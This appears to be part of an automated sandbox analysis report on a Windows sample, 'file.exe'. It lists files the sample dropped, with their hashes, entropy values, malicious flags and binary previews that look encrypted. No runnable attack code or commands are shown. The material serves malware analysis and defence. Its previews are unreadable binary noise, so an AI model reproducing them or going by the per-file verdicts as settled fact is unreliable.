          Preview:var W2.Z'>..,s.S.TO!..B..p5.7..D".-..F....$.X......vZ(.....dA..[.;.T..;..hu....L.2...]..:.m\.#...q.+.......3..)Y..{. r.d..G.."....B..Y].yZ....q..hb e.)Tq..'.q.....v[F...%....."..{....,...2_`......[.U....]..sIC.B9..W.N......0.fi.+....W.@d.dsk.<...Bh..h.....]. |...3u.......F.........%o.8.oE.Ol....jp.e.B...K?mQ|..x.S.F......2z..{..#..h._.y..F....Z.p.....KZ.....m..4..i...!M5+....ut..MU%N.&Z.....=..f.Xc$\.4c.b.\......D..~[....^...^."rs...{.P/h5Q.LR.~g.hw._....-..V=A.}.ii...y...%CE..[..*.....,.1.=....`...O!.n...kV..~SD.ps.NS..(..2`d.....n...o.....x'../%m.b......%/..i..6..T........>..:.I............``....)..P..x.:zL.k....{.@..`R.&c...~.=._....~>'....\w1E............]...G..N.N..4..a..l<......3..~G)3.fg d_...U.Z....i.......4..M!w.I.......dPL..f..^`*.. d:.....*......T.d..`S}.D....%;...C....l4n...Uf`.[^..(.....3....RA..&..\K..t.{..}.m........P.J/&|....;....9...>u.N.....B....L......k....E.....I..1.y.P.:..Px.*...X._....lj...$..p......7.G.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):340
          Entropy (8bit):7.152112025181415
          Encrypted:false
          SSDEEP:6:jYNvq4314G4K+N7BcYqvCJIVDOkvPovt+xrTfkLygFh54zjGxssZacii96Z:Yvd4GcOdOkvQl+xvkL6zixpZacii9a
          MD5:198E790122A5CB8CAF72F7BC8D1318C3
          SHA1:56B9A60EC51CA0F336B90FFDB6C07EEFF910B391
          SHA-256:C3B3E51583F0D9C6B8BE73ECD36329E354F6B6ED57ABC928FE8AA890054CD19D
          SHA-512:54138446FC09C6328439892C3FE82CFC294460A981E6E5C3178BEEB1138C46C12F3B49D090FC856531F947B73AC31BC2EC2CBD506E6A441F9E18800B212664AA
          Malicious:false
          Preview:z{a:1^^..T.X.4.~.c5..4.#..0...8.G.Du.1.1.... .*...E..-..}u.:...I_...9....~Xu....b.......G..._}\d..:..2!.........l.Xi3D@..ut.` .5..0:Ni..B......f.l.qT..>rZ.oR(.M..).s..p..Y[..o....}.<4A....GS..].&l.+...8..QS#.l..o..q^:....z.9JEZk.......h?....4..?.Rr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3201
          Entropy (8bit):7.946743326334065
          Encrypted:false
          SSDEEP:96:Csc/ws855ocNhTeV4IJzKfmpPwsP58jjOafs83I8j0:CsBsaKcNWzKOpIsP6jkGY
          MD5:CE98DC8D68F83BA21830A3276B3BA1AE
          SHA1:9D189697A337A243C63DBE14331B41A21342FBA8
          SHA-256:192B6719DA77649D471BB6605B865DDC033B964A060AD62A08F8ED2E9D3364C3
          SHA-512:3E255ED4686DE5C56B1449800F870FCC8277537D4C7C19891C989FF6CF3990EDC7281DDFFBCFE70F04688B92DAEA76B9AA5A3D15FADB0DEB290CE686017CF648
          Malicious:false
          Preview:var W...`..:WI.{ .6.~.MH.......Zf3.....8.,:..v~j.H[..|E....s.0...d...2...d(q.....{v.7...DDV.b....7k..W'^k.'...*;...x.Ex..C+....k..6S..L..t...)..75o6?+..kk......_Y...&. =...G.!.=.....d...hdMGo.U....w............?....@....t.....B.l.`lF.._3...bi..H......2a4...^...g..,bU!...T.@...=.^P.[.b...6J8C.d...u.@..d.@....-.0I.Tp..}..n..:......)..........?A..u..8......t..JhgZ.z..E.y(H..jY.Y...h.q.[...d\.CK!.h.1RQ .v.o.v}iW....J%&.4....x...Y..r<#...?..#0T.)(..&....I.T...YP4.tgD.".V..l..m..}.)..c....('L..h...D...!G.+..My....^..t...X...V..e....1.jh.N..1.g..#.... U..S...P.!.6.e........Sx.....iw!A..g.i5. 8.Z*.Z..0../..A..u.S....!.4..j&.@A...E>.:b#zI.!.&Wr.b.'D*..l.CI.......f.Z....."..p.......&V..d.(...nO..`WFvq...}@.......Y.FS.5.*..i.O..D-.5.....R7?...`.wo........yx..:<....]..$.i_.^n.....Hy.1.6.!..\..KH[^.2P.)'#..:.Uc...."..*.0..B..B[.....>....j.J...b.k..=.N...c.pr.mT_.......=.X.4.....L)....1<...pa.;..H..l.hT.....a@.".}/...D..(.......z.~I..an.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):11147
          Entropy (8bit):7.983685355334965
          Encrypted:false
          SSDEEP:192:flRLdgRO4gcBV+/h4QOvWZSdkfJAQyFdNo7g2yKAcLv10P9aM/:jdgE4gQV+/JZSdQAQyFdNo77AcLN2t/
          MD5:F3C0C764D7F1E6040AC8070486F9C6F4
          SHA1:57950EC2565F5FFB1BE710909756268E16985952
          SHA-256:D10B5BEDEED9F0499D09BBD34A3F4FB835DAB8ADC88094996DF8C45C082BE92A
          SHA-512:4E8D287EFF7AAD953907820E3EC4CB8C8FE324D0A5B58C7FD24A2615FB5FB160AB42C27F60D9130E3FAAE6A4A8D8787960E2156B7B6C02B13527F42FB44C4F3C
          Malicious:false
          Preview:var W....S9.p.R-_M..@.6.w.40....\.eL`..#|./...(...k..F.....$..Y5;t......3...)/>V.,j.`'Z..!....;6.k...L.R.....b.wn......$.|..5.4.v.Wn.T...m".....Qh.H...h09ua.Mk...Q'.Y.fv7_+.D.....SE.L>7.S;..F..]..+..4] .+fI..vm..L...w.P...0.{Tn..w.@.\.T.u2......I[O.M.9...ZD.G1......x.}...Dp...x2.P...o5.v..Q...@.>U:7.V......f..`o%.3...=u......9.iL{BX.w9...Et........X3.g..*.k5...;.am.9..)..].K.......".f../..b...{^.~R...../...qR.A................|..;.Ic.yQ.LF}.U..8....{,.-.0A....q..:...A@..D.....I)..>..*lF.. Zu.Mw........-3@al.H....T......>4.....}....p.9...(.U..K8....{..U-.......Hq>.)WN.E....).E..&..yo..&.YT..U.w...OQ@.l.....}`m.Jr.+.GJw0.S..2.8.gQ.$...34.m..pX.....|..oE....c.!w..+.Al.1..`.?.].c.`.N........S3z}!..+-.?A..@DV.4..-...jt?..<.}K..[..%..hb5+...t.........k..o..C:s.J...%K..Z9....~...ZG24.L....M..0Y 83..M...0T.Hu..)q..-p0._.A.\b...lkj.:j.).. ...};..%..4...O.t..t.8*....w...u....5z.fP.:W...H..l...2.....Z<.Q|..Xh3..~..w.VLF..U'A.l..m....8d.P.a.*.....Sg #.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):545335
          Entropy (8bit):7.034176635976589
          Encrypted:false
          SSDEEP:12288:MTpHeTTJoaV4MYwRjMIP0dUW6cUlAvO3WWtAqyebWvTOQ4:Ml+ywRBP0dUW6c7OQ4
          MD5:55DD0BC1182E9BE1F32D8053C5845A4B
          SHA1:0FB165F8332502F6AE0E3E03266FA2DDEDD1EC3A
          SHA-256:CE6305EAD9202C53DB223B46BDDDBFEB8C2FE9AC6303DD4DCA3F757080360D8A
          SHA-512:76107446BAFCB40824DAAB82FFEC529C7A7B4F98A868ECB886377BE4C09E43278945D842770E858E5D6167FB01061F6F1E97B800436BDFFD16E68BEB33F4D738
          Malicious:false
          Preview:(func,5H.:s'.8S?..2vI!..|W./.. ...K.J..w...dU..Gd(.A...Lj..0......Y..[.....b...@J=.,...8..@.}.:I....:%...:b.b.0`"...+$...$.=B4.P..@s?.).i.j.M.......S`..t.+./ .....P.vw.3.sj.N..;..A.XS+...n..#..m..7;.p.....n..[..I.......n.....^.l.0..A. .s...c]t~/.....{x..I.V..|..}<....`N..?..&.4...q....d.=>..E.l..:K.bu....S^..h....H/.}.<b.H....|M..x.,*.s&...F..[.|.,...z........K....7+u.2`...{+@.=.&......n..t9-...........a]..jS8.....Mz.[E..p.....L.........O...>.....QP.....\%..w.*..E,...%+.{.G)E.....(MM..a..&..Q..b...XS)<.......gs...v._.QNe.`.S[{...B.5p..R.O...../....(.^h.....l...... ..W}wb.9.gd<A+"R0..m......H..F.\.].8OQ...u..n.....r.....6..2...RJ..t..4...Y..cO.......<..34.i...<....^..f..l.....dz!o...'^sH..k.(...=;.......C7......CW....x.~.]...+.........DXn..7.K;'^.j:.+.......~...R.W.....0....L...Q4o}.....&..t.U...o.@7.!4.H...$x..l.........Y..3..<......;..A...Na.7:...G.'J..<C=...7W..~.#....`B....N....;zG.O.U.....<..S..vu3.9(....c`.......QU..9.....8..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):59090
          Entropy (8bit):7.996642106775278
          Encrypted:true
          SSDEEP:768:2ZyNzzDHO4FJTHBw761UFBlTDF3681nZtz1vM67NJBRc1wvDfgOfh:9/u4FlH6OmFfTMs5lNPO1sgu
          MD5:ED4FC9193753BA8A2297389A22F009AD
          SHA1:DA054B0048740C534AB5BB844E7E6E1CBC761039
          SHA-256:B1EA2565B339DC2CD2A75FC41126F8C66EBD0414583010A570BF98CEB471A77B
          SHA-512:2862940CAC0882ED2FE889459B8B7DC996C58DC412A38D4431CB6DCECDEC99F00E1BF3C82B8A961FFD9D01AAB9D10340078383E2E9995E445A83168F25082A0F
          Malicious:true
          Preview:var W.(..G:..._....P:a...Je... .&k.g.(...... .T...j_..~...=8.-@W.oR.S.8<.......UN.}...SQa......v\...S.w....0.$D.F..4.t.~To..\d.....L...-...HkI.......b.[5......."..N*.?N\.v..\.cM7..5..f<.B......v/wk.....R...S.....R.I...[.B.`x0..,Qrb(....H.{..`.U..sp.:.~F.*.A`....$.w/.P-).:.hL.~...[.ibI)...u%#m........k.3..a3'.^.......w._8J`..%.g....B$...5`.. ...........N+p.../...wXr...R.^!v..|.,.m..".IX;.....A..d.r.L.j.*2.w..?p....$....0...D...+../8j/w...oc......FXb..1=[..D.l...}(..T.^?.1........R....Kh..M......u..ry...M...=2.lAh8w....=. ..`U..[?..!z'.\.........Zn..=......*0k....Dv.6.....n/.....{..V...A&...n..=....b..aS.0.....h>....D.2cQ.1..n....../F.........s..L..`.I..}..$....=..:s....9..........,B.xzF..? ^...G.. .IQ......6.EL.....i..........P..C>.0o85"FV.(P..P........g.%..+*.G....;%.m....sg$.....}...&.s....@.....1.....T.D_..6......:.......YE...Q._LG.(...kV.BL..c.b./.Di.J...C.....F...o..a..W.....B..!..{.H.Y........9..Wa......R.\.x.GmhR.D.D~.=+h,.n.V...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):121548
          Entropy (8bit):7.998473615694143
          Encrypted:true
          SSDEEP:3072:cMsYqxSPQqn2t9nIc3wLAyyHNSMiGtUbqAJUEW0++H8jTF6q:rshMN2HnBcAdOGUbq8++cV
          MD5:2D38EDDBD95F3DE1AB44236D0062217E
          SHA1:DFB6B53FFA7CC5283D47E14B0863300390E4DCCE
          SHA-256:4EA5F08F3218E5E0AD7457AACA617ADC70FFE226F7E7962FCACA751F059AADA2
          SHA-512:AE0819646E725A37A2C90B19EF915211EB2514F8D06BBC6FE6B3406E6C7FF84A1495B3797F0236B3762F76908730B00EDD73B6FF0BDACF8B48B2E45F109ACB19
          Malicious:true
          Preview:/*!. ..m~.l.w.n.4.D!...5...F._t.V.@.....b....*.Y.._`...=.."...E.z.....N.Z.G.....Ln\8....tu"#')i;a...z3..H.pA$.(]W...qV...w....|.~....G~.. ...h...w...x..)...vn...5... $.+.>aN..X..@?.u..b.g..d..!5..H0.Z..}p.W....n.q..I....k...>..g:......;.Y.s..].}"...,..%.s*.F.|..........S.93....Z.M.y.tAT..xe.K...J.....2.....Y;..}.N=.s.H%'."...RB..P.gt........E....v.0].....M..A...5.t.9h]C..?...P4..^e...YY.....:D...Oj.....C>d....2...jyP\.VL.1.v.W....*......o}I.....d.....Y;...S....(96.@.).>...@...>9....q-;.T.a..m..2p...R0....C[YKM+X..z.?...L.^._....V"EIh:..;NY.e.%.1.8...&....D..T<.@.Y.N..0.;.E...>B.....:....ziOI.8y..'... .Dw5v.pI..v..X.}.tL.T..w]Os...!.S.....o...W.).(....,w..|......~3.f.<..\.:.]7L....L.>&..Q}.."..?D..0?]...>q^..8 7_I..s.c.((.H&..(Q......r.P?...[.]..J.I.t.0.g.c.....b@....=..d.-....\......a..`%........2..Y...Y..L#..8\.../.z.^D....{R5.g.<..Q.\.0:..\..".......-.V...A..cw.+.O.....T....s....g../. .;m4.....NR,.R.c..0...7..r...i.s..z.i.2'....Z...RJ
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3484
          Entropy (8bit):7.93866089827565
          Encrypted:false
          SSDEEP:96:AqFj1ehECk0Wazf4weUHPKo3Fc/dHHZ3X:Aspek3aL42vKEc/dZ3X
          MD5:519A6B563D42ABD2036D03E83CED1F9A
          SHA1:5B968448CC4A38B7245AF8E5B26C7C12C570845B
          SHA-256:D99E090F4DED7F5BF5FF9430FD900B2B0B915459B78E5E0DADB22D69384AA825
          SHA-512:065E1D4D4390244D5E98BD4ED07872F4645E6B708D8A0966B266BB546F7BBF2E5C141A58C9BEBC21308AC1CF05260D25508C39480CA33F74EBD5DB69C9615BAA
          Malicious:false
          Preview:CACHE...Ni.....@MB.*.l5..SG.i@.y.j......:^.61..5k2k..TRv..1..8/@...X^.tj...8.Odb.0u.+V.7.[4./.....#v<.n!......S.n..at.nH.0..y.tP....9". .i......N....#..XF....k.;... .cr..$..b.\R.....E../g.U.1Gy9..6.PA/:.$..U..U..!....I.......7..V._..F.]...^<v..%....C[f.0...d..#.....K..9`.\.....yA.E0.S...".S.UN"'.@+.Zk>.%.N.\.O.;lsq....s$/o..]I..E}.x.........D...?.>'.m.....W.m.[......8....HX.n..W...k..'......Nz...)..X.Y..:..=......%...../.|.x/X......F.z..(2...).x.d..S3..>...2.Q.Z.~o`.....Q.(.qF...t.......E.mzX@..........R0SaQc{....2,<.a.\[...M...a^.......P..B..t... ..PmNy.V.B.[.(...f.s..\....4.@..........7:h<.v...<.b%.J.....hJ.......#(.......K....E.[..+...X....c.X..5.[[.<.&$.R/..W.zN<].]Z.D.Q.....J...zs..N...udC0..M........v....a.. ....v%.'..!.G....o./.o<.,!.s...)-.....9O..4.e.k.Y)....G...........4.cd..K...,?D...4..5....._...&i.......PT..o...Ag..U.k...2r...Gx...._..P.\.1....P....8!......c.....)...e\O...Q...~.r..Gf...s%.FPk.=u~...1.St.Z.....U.1.v..".P..R=.I..x?..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):4070
          Entropy (8bit):7.9575845797685645
          Encrypted:false
          SSDEEP:96:5WWC72FeD7JNhdx7COicH9W/xiXj9R8g7sqiFTTB8JrOB/Sv:5WW1FWlNB7JicHw/UF3ighnv
          MD5:CA5299CE961E15E722FE0BFD99275B9F
          SHA1:9821686FB23B7AD39700EC31B054BE8B7B5A4D90
          SHA-256:2BAED84F070A6F1C3FF5803D8B615B99188443A9E59EED305DF5EAEDB250CAF9
          SHA-512:B71D5AA6EEED4908C4AC9270169A5FFD3510861E05750106396F7DF67E626FFA45777E68777CC36FEF0BC5C7B0D6D2F963098992B2594A21F8B27F60C31748B7
          Malicious:false
          Preview:var W.u....R......6A.*.....bx..S..[....,...,.Ey.JD.Bf..A,..l.V...{.O.K."..)E......$.e..ZZ.ut. }.?..)z...3KK...jS..;$........'Q.P..q.^fY..>.B?"M...-...j........v._.%....6.E......_B/W..#'...].3 ..G.+m.....9.N..+...h..6.f.}u..C....!....F.{pqT$j%J;..bOu...Y..$..3.............%;..."v...!..I.u....>.%.e....\.fxT0%..0@.^t.\l....*&...,-@i....`..#ZZ.@.M.....j....b...#...........-;l.dbNx........Y.&j..........L..9L.r..8..T. ..y.....ay. O..S.?_|....:4...M..E..U.y.L..b.[.h...J0`3A..... .x..E.#.h\...>..h.l...f.....RI....FK.*|b..I<p`...u....d@F .....?..f.....[.5....).z.`L....).V..X.@.`W.Ic.g....-^... ..co.....>.c....0.d..U.iW..!.."..*..a.W....K..V}..._ <b.8....7.|.WTA.%..8x2.....B.t....2...VB..n...-...~...T[2&9B..Q..m..L0. .R.yrS!..az.-.v1..<...`}.....e.f.I.BA_.w4.).7..?...C[.M...6....B..,.....f.o..$...1..N..5...QH..{.......Y.UY..^...D...p..J9}....KG.q.&c.?......|r..z.\..tI.2..H&e.P-$=./..........^..]..9)...YB3.J.H.=..1....a.o4;....p.I....9.H.wO......_...?Q..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):290621
          Entropy (8bit):7.206997675803516
          Encrypted:false
          SSDEEP:6144:CSOa0Cg8+jn6B4UISlM59BgNfUCnZWHDH8HDHcHRHOHVjbUq7jdBBVbKyOqaYVHr:1Fgbj6B4klKLg1UCnZWHDH8HDHcHRHON
          MD5:C581D7AC117B73F5FC964E907DE13A05
          SHA1:A2D76D3E9661332C17DB37922D33491DBD78646A
          SHA-256:D8C5890565DEF979DF52871A65E90A04AE6FD266F8A9555F361F44722ACA55FA
          SHA-512:DEAF37AA6B6AC26DB4575A014E9110D885685E59169260E60311D78061B2A1BD4E4B4DEA966E352D745A0C9C3E5C2E7FEAEF30FF5B7389F8E20A73E19B75CCD4
          Malicious:false
          Preview:#topR,..&99Nl.4>..D..uq.w.O.|.......{.Q....1.S.g..t\E...H..Z.......az.3...>......Y...^w...+..l.ux.P...Z.%U4.K.o.z.5....P,..?.V+.,)....fi@.C7.If......u...-i.I[.&..;V[..3..A..F.A.@.....4H......b.....2....~...Z9..dR#......K......`....I.)..*..K...2.../..d.c.` ,Z....A....g....u@..k..V.Cn..X.78.h..L@+;.s*.$@m...=.....i..D...T.K.B\....rvT.#F...m.....?.....i..6N..W...1...w..x..3...]_cN.So...T..d.x@...I.[H......../...u..uc.U9s......]D.W.W_..1.._..X....=6.)T.........?..Bj..=3..C#.|.A....@+.F7.O@...]*Q..x..;\..h.7~9v.....L.9..`.|a......)...M..J..S..o.U..`........j'.}..hX..a....`G...XH.6...f...S>..7,.z.4L.k.................R/.%f....zL.k...:.....'....D..~ ..J`!4.e.O.T.y..he[...&4..S[./1..k.8..T4..........M.....+.......G.-.p..g~7..&.4p.&.#.7Q-..>...m..-~P.....Y+..)......!...`E..... .y;%7.:.c..;.hWD.|p.>.Q.H..m...{...g...g...K@..`k.F.@I.z.f.v/........&...8.<.B.q......DO.g..v....+. ..y.....$0......M..<~...{z...... ./<kYA..Z.c.nEDi....<...h..T[|[!n
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2224
          Entropy (8bit):7.906058341843033
          Encrypted:false
          SSDEEP:48:FRh8JcZyZ4uOzVrxALaBGDweNNpYWZdP5cvFm1l7ivDOVzeiD:FYvGpx8aItNpYWgF5DOVzh
          MD5:081692336AB73AFAAF89245BA3F4F31E
          SHA1:D700B23C8FAB4411F240755C40A6D76318A3DA58
          SHA-256:0BDD05B4B26B19AE4D4D05C75FA29B91A81CE0AF209BCCB881A6DB6AC3DCFC76
          SHA-512:D4B051E7C9DCA54B34D8903DEEC8EFF3825AC78D64EC50743370527553143026BB9B1881E7BAFC16B939A15431C8F089FDC2FED570A2E5DBFE0DEDDF705FE0C2
          Malicious:false
          Preview:var W.....3....L.g....4.w.s}(p`..o.$.09....V{....T.+..b.%.._.<........o|.$L..d..."v..6.....K]D.?..+.?...L|...E|.I.dG].CI..K...X..|A.Q./?ah.jDD.?.`..R.d+cJZ.kub..M...f.h....>_.D.'.P...$.....C."....q.HHP.[../..x.>..0..%{...j.....u...\..h.}Q.\-..e{=..u1BQ}.S.+.P..M...,....^,w.P..^.....P..4...,R.1K5..d..D.....l..$k.B9.......0..9.........X.......<3.._.....C..-[_~...J....Lc...g$b}0....M-%{n.E..N.-..a.....-.......%.....S.e7.5...Nar(N.,.B....w..zQ...+.X....w*d...k....:EY".....nr)..R..q;....k...y....1.$9b<......n$.D...DNzq.8.R..A*.1..B...L.....g...}Ds.3....B..G....pp...^m..+*.[:e....w9...G-....W.X.t.......'[>..a./.7R=q.w6...`.D.$_zD...a.I..H{..........G...-.`$.j`.x.M....Z1....s..|......G....8.P._Umi....B_..ar...!t).xW...r81.fP7...............Vp....H......../A.............>DY.j.M...W..55..,.......*}...:*....tk...|.O...../.y.(*...r)}...W.R.UT.......&^....l.I...?......Q..l8.g....G.jjY..pN8.".b..I..(._P.....'r...F1.v..}....y....!.$........
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):172728
          Entropy (8bit):7.946023439514941
          Encrypted:false
          SSDEEP:3072:Qm1qPcwhjgfk7nzqNoHMr9GSIBg0Tc8fHbI++KyANzugztnqqCn8F:xAPDh9TzvHu9OTlHbTcqzdtn3
          MD5:DD4ED7422AEA32A6863F4625AF7E2224
          SHA1:97EA1F29D9DC91AECFE5F836573EAC12EF960DA3
          SHA-256:6E48B4E1377CF0DF3E63B31211E53CC404B0B16580C4B6E1F183F0D9BB4D5EFE
          SHA-512:BB306627B282261EFE4BCB68B429B3D9A29751CF467027E88E249136234BC0C4238C81D4F1E35C4B9680840BC5F5FD7A415F679EF0CF2A2B7B3EAD7493EFE2CD
          Malicious:false
          Preview:"use |Pdf:......#.f..U.......^...r7oM.N...-..D...-@.S..0..>.Y|R..^...Y.n.^8.,......#....u..%.(... S.8.u.f.....M..*A.ZK.CV\.._N....N..tb..Q...@..GF7y..s.F....)......YJ...>S<.}...Z...'...)...dP.U..C......@@..i.6...5...u/.!..T3RR....#h.0o....\...&.../:..#.V....F.B.B*...)A...?.6.Z...lt=..|..x.......n......A..2...QADH...H4..j...f....I.......^.C........Vr.V...".......n.M..y..b...U.I....6%........g.c[>ua..V..+..l..RckU..WK9...2j....1.)o@..r|FD...`.3u .u....IY|.....y..8...H.y.t.W..q^..l..A#-G...}.N....R....4....&...2...F...b..`U...Xa.M ......D..w.y..}...1.T......."+/...%.....~..}.S..?M...K..T$l..2..p"..8....k...%........1..U.WT1..Y_.X.^X.o.].....*r}..f...5@$h...^B.(Y..}TJ.\(...cP.Q...%"Z.3.QA...P...u7J...d..y)G@..7J..Q.uJ_.......Kw. o.......M#.. ...E^..g,..x.h~S.&%.........=..>..-...&?..b.e........E.j?..>..).NP...;vJy)9..:}6F.2.o....6..-.v./..F..Q......".+.FH..Y4.....D.i..q.].^....G....C.U.4?dc(.S.......@(q....0K.K.?..wn?.Ief.!.B....?..."..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):14700
          Entropy (8bit):7.987142182858304
          Encrypted:false
          SSDEEP:384:7yiZYIBego5DL5FkD9zeiHvtHFAvyOIXXw9ukL:7WIBE8lfXXwEc
          MD5:D0D82127C3834C578C1F104DFE3F501D
          SHA1:C27076B5D8C631D31BB50DA02CC3681D2FE6DF50
          SHA-256:518EB1D0827ACF4A3D8EC2B3879209C6B621B74EEF64F876E0A11F1401A033CE
          SHA-512:B6F6C9954415F5DDEFCC60710659209EB913DA1CB1EBB34FE7D6FDC1DD6C655D0AB18C9318F3C024987F238C740FFB6F98E9EC706CAE60FEC0A1158802AC0330
          Malicious:false
          Preview:var W.I...3H.eR..a.Y.f....*.WFXc.Sn1$O..Q.....}.*..'.......k...o..M.2....F..(({.[...+.._.>....F..4.....n]...n|3...I....-].........U.3.tb..p...;d....q.4t..v..:.x.b@..~.J.F=M.%....Ki./.C5J.<B=.@G.....K.qw... .G....>.Ul.....Y.].......Y...!.....;9..G..<.8.w.g?.x......@t.G..g. ..x..DZ..........D...'..7t..n..s.5..M.;..h.[...*6...6...N..SM.DF....4..et..y.1.m..E..k=....4.3/SU._.x...\.=n...... Q.t..7i....).....s..\.ut.....~..,.%L-.....0.%..<..y...w..fGu...1.*P.rb}....B.....e......7...Q..K..$e.......sN^..4.r..H..H.1..>..<...W.>.........v.!....8l|...q..>....D4o.xR.f"..).!M.Img....z..X.L..I..g.....>...>%....d.M......../.G!].h....<S.T. ..VbR.X.Yu...Nn..qD.....=.......Ggx).zs.j"..Q8z.$x.....f..r..........#..S"8N...G(....fD.z^m.y..7s.. u.m3.y7...s.K..8....opA.*4..aj.pS....t....s@..%......z=...a...-O.B.\.3b......a2^...:.|[Q..Q].....j..z..*..\~O.e.Y;..(....<._.&.|...b?6....w.....R.b8...g....bc.....p.....ka_9.Z.$.|)..x.M.....Yf.....wF0.......,.%.~..?.].o.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1825
          Entropy (8bit):7.89307780237685
          Encrypted:false
          SSDEEP:48:S2o/BMfcEKWZu7fg/o+Y75/xsiw+5H7mG/VoGniD:S5pPEu7fgQ+M7siw+5Kwq
          MD5:115C3F0AEB572162A42361699A9FFA39
          SHA1:5CFF640B8752F5C976954F1FB3E2227467D91962
          SHA-256:67BF0A7629EC12906E2E74D8ACD99A451DAF5BE4C6C1E8A61EFCBB1ADE1EEA9E
          SHA-512:E30546CAF9F3A471EF8519B82A511B42B1E6770EAB57BE608FDE3E98503B170CB09CE4E151BBD2A0BC6A7E9DC3EBBBF365F506BDBA3482D833AC4262C1E5B298
          Malicious:false
          Preview:var W....o.'..M.pn..3..n..|.-e...p.....Ri..>q...".#D......3.]T..7..6:.z....<...NO7.Q.........5.*m.!@...R2p.M....f........M,..MI{<OR.-o../...:...A..\.y...b..t..Bp......-.L..... ......{../H.}.z.k.&.....X.1O.h.+...Q.f.D.........zp..eW=.'XBG..E.4.A.o.`.2.)h..y.[.BO.T....5E4@....{....N..%=.C.Py....#X..PGW.u.V\.=..".........lF..h5_.9kB.y....0..}6.W..0.T....0...s...7........_8"..1.G...)..>[OPx.P..I$.....A.sa......e"p....'."...R0j.'....h.R....xh..{..=.EpHQw..m..4.".e.}.P..C.oW^.f..?..t.a.w.X..Gn...Q@.6..vb...g..,c`0.e."."A..`...,.bFR....)....5..PH..%......SU.1.J..w7.:..V...D.)....7?...&.....U.U.i..T.:......{8`.%.../.........`...Rp..K.^..@.q......h...X:M...EtG.z....9T*`.i0..>...D...b..H.?...s...y..0...Sr...H(.......0...KY.(.'j.X].!..c...4Oh=.OC...M..$e.2.QA..<,..dEa.Yw1.*'..\...1..R..5E/fO.nPk\b.<>.hH ..Z.5........,.F.ib..rC.t..E..\..b.I...*N%....(..wY..j.X.p....v.8.\..Z.Yqn..8:....P... ...*.9..\$$.<=..........ku..D|_x..)...z..}2D.....JY....*..jo(*.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):7794
          Entropy (8bit):7.9754553860506485
          Encrypted:false
          SSDEEP:192:wL1nkrBnFp8LZYfOfeoIdauq9IdXeK1YLwxq+:sqnFp8Lqfndaud51YMo+
          MD5:A7A31A071A27EB1C73570AD16818C454
          SHA1:856F5EC57FF9E125B4CEA2B372B010E8407A9414
          SHA-256:3BB65DF303F3E8261915E84F3F3C3D987DA90C5D71A61A0B008E7EE3A2BBFE7B
          SHA-512:6BBAE90603CB9B36A750D85E42FA93F05CFDD0DBDC615958F8853C0A84A1271F21C725C1000288F62FC010F5BEB55DEAB3524C063D5A1EF49E058236102E8552
          Malicious:false
          Preview:var W....K.]tKK=A..hk.f/q.S-.M...._1K.}BE.r....R...aT1..V...*.M.mD....f...=/>*.4!.y[..E...0.j.j3.._Z..9....,..u}....PJ.&S..5...`?Ox9..1..\...6.....[.{...|..Z.<......WW.......W#.......m. Tn...7........Y../K...BQ.;._.....(r..<).....e.e:4....6..L|.Ju.H.mZj0......g......../....d(..b..7.f....e.oY.....b..<.W..E.Y.(..or.R6k.6.Hk....tc...&5F...'.;...._..........}..>. .X.|.W.Ag...^..h.D.Sx+..|....o}I)=~..a.....R.Y..t..s.%].Vl0.w...I.g.]^......c.N.j.P+..c....Urps..e..q..JcEq...$"{.u...4...b}/...b3d`.0+I6.<p.M..w,..%E.F...{.a..S..3j...9...d..j..B...,..!.)...02)8.U.t...a.;.H.#..+..`...w......&5.Ns...~8...6<.gg....X...k...5...7.x...j-...%..a./...v.j..S..&0.S=..J.AYLQ.I...P3.M5cK...i..}.....|...}...,.Q...|.T.g59....*.3Q......l.....D.....>>p.......C./.P.!0..SO. ...0..'/.`e.\.h./.Fo..Y%..U*v.....9..t.i.V..x'.F..cr7u...kP..^....=:.".C....v.m..)......G'^..n....9...q..x../[.=...pb....d<./.........b@..+;,1..-..?.....q..CAg.l..m.....-..L..........~...X.lB.~........HD....
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):44680
          Entropy (8bit):7.996583584879629
          Encrypted:true
          SSDEEP:768:OnyFVhT39b4HaCX1ivf0hccCKu5Ge7qxvJFiW+5BX/Y2wmCVsJWeAMNTHeG9vXjF:E2VtuHRX1ivfeccob7qBJFV+HT7pPTHJ
          MD5:86D770464C463BD30C7185A37F2626F4
          SHA1:320679780D8A71E511E58FB93D3E965CA89BFE60
          SHA-256:E0F2B26575723ECEDCACE14F457E6FA46F488E97118AB21FF11A3765BB17E8FD
          SHA-512:D66EBBD195D4412D49C244AA52C432531D93EDFB37382CE5AF59E432BAA4EEB7B9F9F51CBF676D9598650CE45740B523215031586EFC6210FD9F70E405258FA5
          Malicious:true
